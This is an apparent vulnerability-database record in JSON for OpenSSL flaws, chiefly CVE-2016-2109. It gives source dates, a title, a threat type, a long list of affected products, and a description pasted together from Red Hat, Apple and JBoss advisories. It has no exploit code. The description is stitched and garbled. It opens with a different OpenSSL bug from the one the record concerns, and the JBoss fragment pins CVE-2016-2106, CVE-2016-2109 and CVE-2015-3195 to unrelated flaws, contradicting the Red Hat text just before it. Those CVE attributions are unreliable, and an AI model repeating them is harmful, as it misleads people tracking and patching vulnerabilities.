        "date": "2016-12-07T16:37:31",
        "db": "PACKETSTORM",
        "id": "140056"
      },
      {
        "date": "2016-05-04T14:53:10",
        "db": "PACKETSTORM",
        "id": "136912"
      },
      {
        "date": "2016-05-10T17:01:56",
        "db": "PACKETSTORM",
        "id": "136958"
      },
      {
        "date": "2016-05-03T22:55:47",
        "db": "PACKETSTORM",
        "id": "136893"
      },
      {
        "date": "2016-10-27T19:22:00",
        "db": "PACKETSTORM",
        "id": "139379"
      },
      {
        "date": "2017-07-26T17:44:00",
        "db": "PACKETSTORM",
        "id": "143513"
      },
      {
        "date": "2016-07-19T19:45:20",
        "db": "PACKETSTORM",
        "id": "137958"
      },
      {
        "date": "2016-12-16T16:34:49",
        "db": "PACKETSTORM",
        "id": "140182"
      },
      {
        "date": "2016-05-04T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201605-083"
      },
      {
        "date": "2016-05-05T01:59:05.357000",
        "db": "NVD",
        "id": "CVE-2016-2109"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-11-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2016-2109"
      },
      {
        "date": "2017-05-02T01:10:00",
        "db": "BID",
        "id": "87940"
      },
      {
        "date": "2017-10-03T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-002476"
      },
      {
        "date": "2022-12-14T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201605-083"
      },
      {
        "date": "2023-11-07T02:30:56.300000",
        "db": "NVD",
        "id": "CVE-2016-2109"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201605-083"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "OpenSSL of  ASN.1 BIO Implementation of  crypto/asn1/a_d2i_fp.c of  asn1_d2i_read_bio Service disruption in functions  (DoS) Vulnerabilities",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-002476"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "resource management error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201605-083"
      }
    ],
    "trust": 0.6
  }
}

VAR-201605-0075

Vulnerability from variot - Updated: 2024-07-23 20:50

Integer overflow in the EVP_EncodeUpdate function in crypto/evp/encode.c in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to cause a denial of service (heap memory corruption) via a large amount of binary data. OpenSSL is prone to a buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied data before copying it into an insufficiently sized buffer.. Attackers can exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will result in denial-of-service conditions. Following product versions are affected: OpenSSL versions 1.0.2 prior to 1.0.2h OpenSSL versions 1.0.1 prior to 1.0.1t. It supports a variety of encryption algorithms, including symmetric ciphers, hash algorithms, security hashing algorithm, etc. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

===================================================================== Red Hat Security Advisory

Summary:

An update for openssl is now available for Red Hat Enterprise Linux 6.

Relevant releases/architectures:

Description:

OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library.

Security Fix(es):

A flaw was found in the way OpenSSL encoded certain ASN.1 data structures. An attacker could use this flaw to create a specially crafted certificate which, when verified or re-encoded by OpenSSL, could cause it to crash, or execute arbitrary code using the permissions of the user running an application compiled against the OpenSSL library. (CVE-2016-2105, CVE-2016-2106)
It was discovered that OpenSSL leaked timing information when decrypting TLS/SSL and DTLS protocol encrypted records when the connection used the AES CBC cipher suite and the server supported AES-NI. A remote attacker could possibly use this flaw to retrieve plain text from encrypted packets by using a TLS/SSL or DTLS server as a padding oracle. (CVE-2016-2107)
Several flaws were found in the way BIO_*printf functions were implemented in OpenSSL. Applications which passed large amounts of untrusted data through these functions could crash or potentially execute code with the permissions of the user running such an application. (CVE-2016-0799, CVE-2016-2842)
A denial of service flaw was found in the way OpenSSL parsed certain ASN.1-encoded data from BIO (OpenSSL's I/O abstraction) inputs. An application using OpenSSL that accepts untrusted ASN.1 BIO input could be forced to allocate an excessive amount of data. (CVE-2016-2109)

Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted.

Package List:

Red Hat Enterprise Linux Desktop (v. 6):

Source: openssl-1.0.1e-48.el6_8.1.src.rpm

i386: openssl-1.0.1e-48.el6_8.1.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm

x86_64: openssl-1.0.1e-48.el6_8.1.i686.rpm openssl-1.0.1e-48.el6_8.1.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm

Red Hat Enterprise Linux Desktop Optional (v. 6):

i386: openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm openssl-devel-1.0.1e-48.el6_8.1.i686.rpm openssl-perl-1.0.1e-48.el6_8.1.i686.rpm openssl-static-1.0.1e-48.el6_8.1.i686.rpm

Red Hat Enterprise Linux HPC Node (v. 6):

Source: openssl-1.0.1e-48.el6_8.1.src.rpm

x86_64: openssl-1.0.1e-48.el6_8.1.i686.rpm openssl-1.0.1e-48.el6_8.1.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm

Red Hat Enterprise Linux HPC Node Optional (v. 6):

Red Hat Enterprise Linux Server (v. 6):

Source: openssl-1.0.1e-48.el6_8.1.src.rpm

i386: openssl-1.0.1e-48.el6_8.1.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm openssl-devel-1.0.1e-48.el6_8.1.i686.rpm

Red Hat Enterprise Linux Server Optional (v. 6):

i386: openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm openssl-perl-1.0.1e-48.el6_8.1.i686.rpm openssl-static-1.0.1e-48.el6_8.1.i686.rpm

ppc64: openssl-debuginfo-1.0.1e-48.el6_8.1.ppc64.rpm openssl-perl-1.0.1e-48.el6_8.1.ppc64.rpm openssl-static-1.0.1e-48.el6_8.1.ppc64.rpm

s390x: openssl-debuginfo-1.0.1e-48.el6_8.1.s390x.rpm openssl-perl-1.0.1e-48.el6_8.1.s390x.rpm openssl-static-1.0.1e-48.el6_8.1.s390x.rpm

x86_64: openssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.1.x86_64.rpm openssl-static-1.0.1e-48.el6_8.1.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 6):

Source: openssl-1.0.1e-48.el6_8.1.src.rpm

i386: openssl-1.0.1e-48.el6_8.1.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm openssl-devel-1.0.1e-48.el6_8.1.i686.rpm

Red Hat Enterprise Linux Workstation Optional (v. 6):

i386: openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm openssl-perl-1.0.1e-48.el6_8.1.i686.rpm openssl-static-1.0.1e-48.el6_8.1.i686.rpm

x86_64: openssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.1.x86_64.rpm openssl-static-1.0.1e-48.el6_8.1.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

References:

Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

iD8DBQFXMXPXXlSAg2UNWIIRAmqpAJ4sxaxPc4fbLjR32h/PW1fxwOZG7ACgtaSz 6dbI0EemYRoHCDagPHSycq4= =g2Zb -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512

APPLE-SA-2016-07-18-1 OS X El Capitan v10.11.6 and Security Update 2016-004

OS X El Capitan v10.11.6 and Security Update 2016-004 is now available and addresses the following:

Note: OS X El Capitan 10.11.6 includes the security content of Safari 9.1.2. For further details see https://support.apple.com/kb/HT206900

OS X El Capitan v10.11.6 and Security Update 2016-004 may be obtained from the Mac App Store or Apple's Software Downloads web site: http://www.apple.com/support/downloads/

Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT201222

Red Hat JBoss Enterprise Application Platform 6 is a platform for Java applications based on JBoss Application Server 7.

Multiple flaws were found in the way httpd parsed HTTP requests and responses using chunked transfer encoding. A remote attacker could use these flaws to create a specially crafted request, which httpd would decode differently from an HTTP proxy software in front of it, possibly leading to HTTP request smuggling attacks. (CVE-2015-3195)
A flaw was found in the way the TLS protocol composes the Diffie-Hellman exchange (for both export and non-export grade cipher suites). An attacker could use this flaw to downgrade a DHE connection to use export-grade key sizes, which could then be broken by sufficient pre-computation. This can lead to a passive man-in-the-middle attack in which the attacker is able to decrypt all traffic. (CVE-2016-2106)
It was discovered that it is possible to remotely Segfault Apache http server with a specially crafted string sent to the mod_cluster via service messages (MCMP). (CVE-2016-2109)
It was discovered that specifying configuration with a JVMRoute path longer than 80 characters will cause segmentation fault leading to a server crash.

The References section of this erratum contains a download link (you must log in to download the update)

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201605-0075",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "openssl",
        "version": "1.0.2d"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "openssl",
        "version": "1.0.2c"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "openssl",
        "version": "1.0.2e"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "openssl",
        "version": "1.0.2f"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "openssl",
        "version": "1.0.2"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "openssl",
        "version": "1.0.2a"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "openssl",
        "version": "1.0.2b"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "openssl",
        "version": "1.0.2g"
      },
      {
        "model": "enterprise linux hpc node eus",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "redhat",
        "version": "7.2"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "redhat",
        "version": "7.2"
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "redhat",
        "version": "7.2"
      },
      {
        "model": "peoplesoft enterprise peopletools",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "oracle",
        "version": "8.53"
      },
      {
        "model": "peoplesoft enterprise peopletools",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "oracle",
        "version": "8.54"
      },
      {
        "model": "secure global desktop",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "oracle",
        "version": "4.63"
      },
      {
        "model": "secure global desktop",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "oracle",
        "version": "5.2"
      },
      {
        "model": "peoplesoft enterprise peopletools",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "oracle",
        "version": "8.55"
      },
      {
        "model": "secure global desktop",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "oracle",
        "version": "4.71"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1j"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1q"
      },
      {
        "model": "mysql",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "5.7.0"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1"
      },
      {
        "model": "node.js",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "nodejs",
        "version": "0.12.14"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "15.10"
      },
      {
        "model": "node.js",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "nodejs",
        "version": "5.0.0"
      },
      {
        "model": "enterprise linux hpc node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "node.js",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "nodejs",
        "version": "6.0.0"
      },
      {
        "model": "mysql",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "5.6.30"
      },
      {
        "model": "mysql",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "5.7.12"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1i"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1m"
      },
      {
        "model": "node.js",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "nodejs",
        "version": "5.11.1"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1b"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "14.04"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "8.0"
      },
      {
        "model": "node.js",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "nodejs",
        "version": "0.10.45"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1r"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "12.04"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1p"
      },
      {
        "model": "mysql",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "5.6.0"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1a"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "node.js",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "nodejs",
        "version": "0.10.0"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1k"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1o"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1d"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1h"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1n"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "13.2"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1f"
      },
      {
        "model": "node.js",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "nodejs",
        "version": "4.4.4"
      },
      {
        "model": "node.js",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "nodejs",
        "version": "4.0.0"
      },
      {
        "model": "enterprise linux hpc node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "node.js",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "nodejs",
        "version": "4.2.0"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.11.5"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1e"
      },
      {
        "model": "leap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "42.1"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1s"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1g"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1l"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1c"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "16.04"
      },
      {
        "model": "node.js",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "nodejs",
        "version": "4.1.2"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "node.js",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "nodejs",
        "version": "0.12.0"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "esmpro/serveragentservice",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "all versions  (linux)"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "(v. 7)"
      },
      {
        "model": "webotx application server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "foundation v8.2 to  v8.5"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "(v. 7)"
      },
      {
        "model": "enterprise linux hpc node",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "(v. 6)"
      },
      {
        "model": "ucosminexus developer standard",
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": "enterprise linux hpc node eus",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "(v. 7.2)"
      },
      {
        "model": "fusion middleware",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "of  oracle access manager 11.1.1.7"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v3.0"
      },
      {
        "model": "ucosminexus application server smart edition",
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v6.2"
      },
      {
        "model": "cosminexus developer version 5",
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "(v. 7)"
      },
      {
        "model": "exalogic infrastructure",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "1.x"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v7.1"
      },
      {
        "model": "mysql",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "5.7.12 and earlier"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "openssl",
        "version": "1.0.1t"
      },
      {
        "model": "cosminexus primary server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "base version 6"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "(v. 7.2)"
      },
      {
        "model": "openssl",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "openssl",
        "version": "1.0.2"
      },
      {
        "model": "leap",
        "scope": null,
        "trust": 0.8,
        "vendor": "opensuse",
        "version": null
      },
      {
        "model": "websam",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "7.0"
      },
      {
        "model": "cosminexus developer standard version 6",
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": "cosminexus developer professional version 6",
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": "ucosminexus developer",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "professional for plug-in"
      },
      {
        "model": "web server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "none"
      },
      {
        "model": "ucosminexus service platform",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "- messaging"
      },
      {
        "model": "ip38x/3000",
        "scope": null,
        "trust": 0.8,
        "vendor": "nec",
        "version": null
      },
      {
        "model": "cosminexus application server version 5",
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": "ip38x/1200",
        "scope": null,
        "trust": 0.8,
        "vendor": "nec",
        "version": null
      },
      {
        "model": "webotx application server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "st ard v8.2 to  v9.4"
      },
      {
        "model": "mysql",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "5.6.30 and earlier"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v3.1"
      },
      {
        "model": "websam",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "netvisorpro 6.1"
      },
      {
        "model": "ip38x/810",
        "scope": null,
        "trust": 0.8,
        "vendor": "nec",
        "version": null
      },
      {
        "model": "webotx enterprise service bus",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v8.2 to  v9.3"
      },
      {
        "model": "ip38x/n500",
        "scope": null,
        "trust": 0.8,
        "vendor": "nec",
        "version": null
      },
      {
        "model": "ucosminexus developer light",
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "/sg series  sg3600lm/lg/lj v6.1"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "(v. 6)"
      },
      {
        "model": "cosminexus developer light version 6",
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": "ucosminexus application server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "st ard-r"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "(v. 6)"
      },
      {
        "model": "ucosminexus service platform",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "none"
      },
      {
        "model": "capssuite",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v3.0 to  v4.0"
      },
      {
        "model": "univerge",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "business connect v7.1.1"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v4.0"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "apple",
        "version": "10.11 and later"
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "(v. 7.2)"
      },
      {
        "model": "ip38x/sr100",
        "scope": null,
        "trust": 0.8,
        "vendor": "nec",
        "version": null
      },
      {
        "model": "cosminexus application server enterprise",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "version 6"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "openssl",
        "version": "1.0.2h"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "(v. 6)"
      },
      {
        "model": "cosminexus primary server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "version 6"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v8.0"
      },
      {
        "model": "websam",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "6.2"
      },
      {
        "model": "enterprisedirectoryserver",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "ver6.1 to  v8.0"
      },
      {
        "model": "secureware/pki application development kit",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "ver3.2"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v7.0"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "/sg series  intersecvm/sg v1.2"
      },
      {
        "model": "ip38x/1210",
        "scope": null,
        "trust": 0.8,
        "vendor": "nec",
        "version": null
      },
      {
        "model": "ucosminexus primary server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "base"
      },
      {
        "model": "webotx application server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "express v8.2 to  v9.4"
      },
      {
        "model": "exalogic infrastructure",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "2.x"
      },
      {
        "model": "ucosminexus service architect",
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": "ucosminexus application server enterprise",
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": "enterprise linux hpc node",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "(v. 7)"
      },
      {
        "model": "cosminexus application server standard",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "version 6"
      },
      {
        "model": "ucosminexus application server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "express"
      },
      {
        "model": "webotx application server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "enterprise v8.2 to  v9.4"
      },
      {
        "model": "web server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "- security enhancement"
      },
      {
        "model": "ip38x/3500",
        "scope": null,
        "trust": 0.8,
        "vendor": "nec",
        "version": null
      },
      {
        "model": "ip38x/fw120",
        "scope": null,
        "trust": 0.8,
        "vendor": "nec",
        "version": null
      },
      {
        "model": "ucosminexus developer",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
